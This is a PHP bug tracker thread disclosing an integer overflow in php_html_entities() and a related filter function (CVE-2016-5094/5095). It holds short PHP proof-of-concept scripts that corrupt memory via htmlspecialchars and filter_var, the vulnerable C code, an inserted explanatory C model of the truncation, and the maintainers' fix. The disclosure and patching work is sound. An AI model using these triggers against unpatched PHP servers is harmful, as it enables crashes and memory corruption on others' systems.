Sec Bug #72135 Integer Overflow in php_html_entities()
Submitted: 2016-05-01 18:47 UTC Modified: 2016-05-26 21:04 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.35 OS: *
Private report: No CVE-ID: 2016-5094
 [2016-05-01 18:47 UTC] taoguangchen at icloud dot com
Description:
------------
```c
static void php_html_entities(INTERNAL_FUNCTION_PARAMETERS, int all)
{
	...
	size_t new_len;
	...
	RETVAL_STRINGL(replaced, (int)new_len, 0);
}
```

new_len is defined as size_t and is then cast to a signed int in RETVAL_STRINGL(); that turns new_len into a negative value and produces a corrupted string-typed ZVAL.

PoC1:
```php
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	var_dump(strlen($str));
	
?>
```

PoC2:
```php
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	md5($str);
	
?>
```

Fix:

Checking new_len


 [2016-05-02 02:34 UTC] taoguangchen at icloud dot com
A lot of functions, when given a corrupted string-typed ZVAL, will be able to lead to a memory error, e.g.:

defined
class_exists
function_exists
...
trigger_error
date_default_timezone_set
hash_init
...
date
gmdate
...
collator_create
normalizer_normalize
grapheme_strlen
...
 [2016-05-04 14:22 UTC] taoguangchen at icloud dot com
Another example:

```c
ZEND_API int add_string_to_string(zval *result, const zval *op1, const zval *op2) /* {{{ */
{
	int length = Z_STRLEN_P(op1) + Z_STRLEN_P(op2);
	char *buf;

	if (IS_INTERNED(Z_STRVAL_P(op1))) {
		buf = (char *) emalloc(length+1);
		memcpy(buf, Z_STRVAL_P(op1), Z_STRLEN_P(op1));
	} else {
		buf = (char *) erealloc(Z_STRVAL_P(op1), length+1);
	}
	memcpy(buf + Z_STRLEN_P(op1), Z_STRVAL_P(op2), Z_STRLEN_P(op2));
```

PoC
```php
<?php

ini_set('memory_limit', -1);
$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
"$str";

?>
```
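The two reports above come down to one arithmetic problem: php_html_entities() produces a size_t length, RETVAL_STRINGL() stores it into an int, and every consumer of Z_STRLEN_P() (add_string_to_string() included) then trusts that int. The following is an added example, not code from php-src or from the reporter; `str_zval`, `escape_amps`, `retval_stringl_unchecked`, `retval_stringl_checked` and the `concat_alloc_size_*` helpers are constructed stand-ins for the zval, for php_escape_html_entities_ex(), for the pre-fix RETVAL_STRINGL() cast, for the range check the fix adds, and for add_string_to_string()'s `emalloc(length+1)`. It reproduces the PoC arithmetic (0xffffffff/5 ampersands, 5 bytes each) without allocating the buffer, and shows the checked path rejecting it.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for a PHP 5 string zval: the length field is a C
 * int, which is what RETVAL_STRINGL() writes and Z_STRLEN_P() reads. */
typedef struct {
    char *val;
    int len;
} str_zval;

/* Minimal htmlspecialchars()-style escaper (stand-in for
 * php_escape_html_entities_ex): only '&' -> "&amp;" is handled. Returns a
 * malloc'd buffer and writes the true size_t length to *new_len. */
char *escape_amps(const char *in, size_t in_len, size_t *new_len)
{
    size_t out_len = 0, j = 0;
    for (size_t i = 0; i < in_len; i++)
        out_len += (in[i] == '&') ? 5 : 1;
    char *out = malloc(out_len + 1);
    if (!out) { *new_len = 0; return NULL; }
    for (size_t i = 0; i < in_len; i++) {
        if (in[i] == '&') { memcpy(out + j, "&amp;", 5); j += 5; }
        else out[j++] = in[i];
    }
    out[j] = '\0';
    *new_len = out_len;
    return out;
}

/* Output length for n_amp '&' bytes, computed rather than allocated so the
 * PoC's ~4 GiB case can be examined without the buffer. */
size_t escaped_len_of_amps(size_t n_amp) { return n_amp * 5; }

/* Pre-fix RETVAL_STRINGL(replaced, (int)new_len, 0): size_t cast to int with
 * no range check (out-of-range conversion is implementation-defined;
 * gcc/clang wrap modulo 2^32, so 0xffffffff becomes -1). */
int retval_stringl_unchecked(size_t new_len) { return (int)new_len; }

/* Checked behaviour in the spirit of the fix ("don't create strings with
 * lengths outside int range"): reject and free anything that does not fit.
 * Returns 0 on success, -1 when the length is rejected. */
int retval_stringl_checked(size_t new_len, str_zval *out, char *buf)
{
    if (new_len > (size_t)INT_MAX) {
        free(buf);
        out->val = NULL;
        out->len = 0;
        return -1;
    }
    out->val = buf;
    out->len = (int)new_len;
    return 0;
}

/* Length PHP 5.5.35 would store for htmlspecialchars(str_repeat('&', 0xffffffff/5)). */
int poc_stored_length(void)
{
    return retval_stringl_unchecked(escaped_len_of_amps(0xffffffffULL / 5));
}

/* Same input through the checked path: 1 if rejected, 0 if accepted. */
int poc_rejected_by_check(void)
{
    str_zval z;
    return retval_stringl_checked(escaped_len_of_amps(0xffffffffULL / 5), &z, NULL) == -1;
}

/* Escape a small NUL-terminated input through the checked path; returns the
 * stored length, or -1 on rejection or allocation failure. */
int small_escape_len(const char *in)
{
    str_zval z;
    size_t new_len;
    char *buf = escape_amps(in, strlen(in), &new_len);
    if (!buf || retval_stringl_checked(new_len, &z, buf) != 0)
        return -1;
    int stored = z.len;
    free(z.val);
    return stored;
}

/* add_string_to_string()'s allocation size as posted: emalloc(length+1) with
 * int length = len1 + len2. A corrupted op1 length of -1 shrinks the
 * allocation while memcpy(buf + Z_STRLEN_P(op1), ...) still writes from buf-1. */
size_t concat_alloc_size_unchecked(int len1, int len2)
{
    int length = len1 + len2;
    return (size_t)(length + 1);
}

/* Checked variant: size_t arithmetic with explicit overflow and int-range
 * tests. Returns the allocation size, or 0 when the operands are rejected. */
size_t concat_alloc_size_checked(size_t len1, size_t len2)
{
    if (len1 > SIZE_MAX - len2) return 0;
    size_t total = len1 + len2;
    if (total > (size_t)INT_MAX) return 0;
    return total + 1;
}

int main(void)
{
    printf("unchecked PoC length: %d, rejected by check: %d\n",
           poc_stored_length(), poc_rejected_by_check());
    printf("unchecked concat alloc for lengths (-1, 3): %zu bytes\n",
           concat_alloc_size_unchecked(-1, 3));
    return 0;
}
```

Note the exact arithmetic of the PoC: 0xffffffff/5 is 858993459, times 5 bytes of "&amp;" is 4294967295 (0xffffffff), which is why the truncated length comes out as -1 rather than some arbitrary negative value. The checked concatenation rejects the pair (4294967295, 3) outright instead of wrapping, which is the property a reviewer should look for in every caller of php_escape_html_entities_ex.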
 [2016-05-16 06:28 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-05-16 06:28 UTC] stas@php.net
Fix in security repo as 0da8b8b801f9276359262f1ef8274c7812d3dfda and in https://gist.github.com/d07b06bc967ecb94712f729198ae2e81. Please verify.
 [2016-05-16 07:43 UTC] taoguangchen at icloud dot com
The patch looks OK.
 [2016-05-17 12:55 UTC] taoguangchen at icloud dot com
The similar bug in filter:

```c
void php_filter_full_special_chars(PHP_INPUT_FILTER_PARAM_DECL)
{
	char *buf;
	size_t len;
	...
	buf = php_escape_html_entities_ex(Z_STRVAL_P(value), Z_STRLEN_P(value), &len, 1, quotes, SG(default_charset), 0 TSRMLS_CC);
	str_efree(Z_STRVAL_P(value));
	Z_STRVAL_P(value) = buf;
	Z_STRLEN_P(value) = len;
}
```

PoC:
```php
<?php

ini_set('memory_limit', -1);
$var = str_repeat('&', 0xffffffff/5);
$var = filter_var($var, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
echo "$var";

?>
```

You need to check all code that calls php_escape_html_entities_ex/php_escape_html_entities.
 [2016-05-24 23:30 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-24 23:30 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-05-26 21:04 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5094
 [2016-05-26 21:04 UTC] kaplan@php.net
Use CVE-2016-5094 for the original report that had the "[2016-05-16 06:28 UTC] Fix in security repo as 0da8b8b801f9276359262f1ef8274c7812d3dfda" response. Use CVE-2016-5095 for the additional issue reported in the "[2016-05-17 12:55 UTC]" comment.
 [2016-07-04 15:02 UTC] kaplan@php.net
Note that CVE-2016-5095 was fixed in 41fc3c76e97a36ff3b505da7d704ca17bb171fdf, also part of PHP 5.5.36.